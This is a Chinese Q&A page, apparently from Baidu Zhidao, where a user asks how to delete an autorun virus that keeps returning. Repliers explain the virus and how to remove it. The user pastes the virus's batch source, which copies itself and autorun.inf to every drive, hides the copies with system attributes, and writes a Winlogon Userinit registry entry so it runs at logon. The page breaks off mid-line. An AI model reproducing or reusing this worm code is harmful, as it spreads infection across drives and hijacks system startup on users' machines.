病毒文件删除不了呀

来源:百度知道 编辑:UC知道 时间:2024/06/06 05:33:02
我电脑里有四个隐含文件 autorun.inf,s-1-5-21-1214440339.exe,shell.vbs,autoexec.bat;只要是一个盘里有,其他的全都被激活呀,在安全模式下删除了,注册表里也把文件删除了,可怎么一开机就有了呀?这可怎么办呀,我把病毒代码给你们看一下:S-1-5-21-1214440339.EXE:
@echo off
explorer \
xcopy /h /y /r /k .\S-1-5-21-1214440339.exe %systemroot%\system\
xcopy /h /y /r /k .\autorun.inf %systemroot%\system\
@if not exist .\S-1-5-21-1214440339.exe xcopy /h /y /r /k %systemroot%\system\S-1-5-21-1214440339.exe .\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k autorun.inf %%i%:\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k S-1-5-21-1214440339.exe %%i%:\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\S-1-5-21-1214440339.exe attrib +h +s +a %%i%:\S-1-5-21-1214440339.exe
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\autorun.inf attrib +h +s +a

DOS病毒,用的DOS批处理。传染和自我保护过程全在这段代码中写的明明白白的了,楼主自己努力吧。

比如:
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k autorun.inf %%i%:\ 就是把autorun.inf复制到C:D:E:……
还有这个:
attrib +h +s +a %systemroot%\system\autorun.inf 就是为这个文件加上“隐含,系统,档案”, -h -s -a就能解除,等等。

再看这句:
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\autorun.inf attrib +h +s +a %%i%:\autorun.inf
是对已存在的文件,加上属性,这样你就看不到,也删不了,尤其是+S以后,受系统保护。

删它不难的,只要删一些文件,但关掉资源管理器的“按WEB形式浏览”会比较好一些,还有那个EXE和VBS,用搜索功能找出来统一删掉。(似乎文件在复制过程中没有改变名字)

像是红色结束符之类的变种。redlof吧,找找这个专杀行不行。几年前的东西了,恐怕不好找了。

按F8进安全里杀啊,74

echo Windows Registry Editor Version 5.00 >> .\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> .\reg.reg
echo "Userinit"="userinit.exe,S-1-5-21-1214440339.exe" >> .\reg.reg
e